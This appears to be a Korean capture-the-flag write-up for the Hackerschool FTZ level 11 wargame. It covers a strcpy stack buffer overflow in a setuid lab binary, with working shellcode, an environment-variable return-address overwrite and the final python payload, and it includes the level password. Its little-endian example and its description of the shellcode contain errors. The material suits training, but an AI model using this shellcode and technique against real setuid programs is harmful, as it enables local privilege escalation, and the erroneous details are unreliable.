BOF/ ftz-level11

 

FTZ란 Free Training Zone의 약자로 hackerschool에서 배포하는 워게임입니다.
총 20문제로 구성되어 있으며 각 문제를 격파하여 다음 레벨의 패스워드를 얻는 형식입니다.
문제를 격파하고 다음 레벨의 bash를 획득하였다면 my-pass로 패스워드를 확인할 수 있습니다.

사용 linux 명령어
ls - 파일 내역 출력 cat - 파일 내용 확인
gcc - gcc컴파일러로 컴파일하도록 하는 명령 vim - text editor
cp - 파일 또는 디렉터리 복사 명령
export - 환경변수 등록 명령
getenv - 환경변수를 모두 보는 명령
gdb - 디버깅 도구

send me email if you have any questions.


FTZ Level 11

ID : level11
PASSWD : what!@#$?


1
2
3
4
5
6
7
8
9
10
11
12
  
#include <stdio.h>
#include <stdlib.h>

int main( int argc, char *argv[] )
{
        char str[256];

        setreuid( 3092, 3092 );
        strcpy( str, argv[1] );
        printf( str );
}


level11부터는 attackme라는 파일이 존재하며 hint는 attackme의 소스가 제공된다.

소스분석
main에 전달받은 첫 번째 인자(argv[0]은 파일명)를 str에 복사하여 출력하는 소스
strcpy함수는 복사할 데이터의 크기제한이 없기 때문에 argv[1]이 256Byte보다 크다면 buffer-overflow가 발생하는 취약점이 있다.
level12의 권한으로 set-uid가 설정되어 있다.

level11부터는 쉘코드를 사용하여 공격을 한다.
what is shellcode? - 주로 기계어 코드로 이루어진 소프트웨어 취약점을 공격하기 위한 코드.

level12에서 사용한 쉘코드

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
이 쉘코드는 /bin/bash를 실행시키도록 하는 코드이다.

ftz에는 ASLR(메모리 보호기법)이 걸려있다.

ASLR은 프로그램을 실행할 때 마다 메모리 주소가 변경되는 메모리 보호기법


그림1
권한문제가 없도록 tmp디렉터리에 attackme를 복사하고 attackme의 메모리 구조를 파악하기 위해 gdb를 사용하여 intel방식으로 디스어셈블 한다.

어셈블리 분석
main+3 line을 보면 264byte의 공간을 메모리에 할당했을을 알 수 있다.
main+41 line을 보면 str의 주소는 ebp-264이며 str(256Byte)뒤에 8Byte의 dummy값이 있음을 알 수 있다.

메모리구조
str(256Byte)
dummy(8Byte)
sfp(4Byte)
ret(4Byte)


what is sfp? - 스택 베이스 값.
what is ret? - return address로 다음에 실행할 명령이 위치한 메모리 주소.


main의 ret을 쉘코드가 들어있는 메모리의 주소로 변조한다면 main이 종료될 때 쉘코드가 실행될 것이다.


그림2
쉘코드를 환경변수에 등록하고 환경변수의 주소를 ret에 덮는 방식으로 공격을 하자.
환경변수란? - 운영체제가 참조하는 변수
SHELLCODE라는 이름의 환경변수를 만들고 그 안에 쉘코드를 넣는다.


그림3
환경변수의 주소를 얻기 위해 getenv명령을 통해 환경변수의 주소를 출력하는 소스를 작성한다.


그림4
소스파일을 컴파일하고 실행하여 환경변수의 주소를 얻는다.


그림5
ret에 접근하기 위해 ret전까지는 아무 값이나 채우고 ret에 환경변수의 주소를 little-endian방식으로 넣는다.

리틀 엔디안은 최 하위 바이트 부터 저장하는 방식이다.
ex) 0xbffffc11을 리틀 엔디안 방식으로 저장하면 11cfffbf가 된다.
보통 엔디안 방식은 CPU 아키텍쳐에 따라 다르지만 intel x86, x64, AMD 계열은 리틀엔디안, 모토로라 프로세서들은 빅엔디안을 사용한다.
현재 시스템의 엔디안방식을 확인하고 싶다면 echo -n I | od -to2 | head -n1 | awk’{print $2;}’ | cut -c6
명령으로 나오는 값이 1이라면 리틀 엔디안, 0이라면 빅엔디안이다.


페이로드

./attackme `python -c “print ‘A’*268 + ‘\x11\xfc\xff\xbf’”`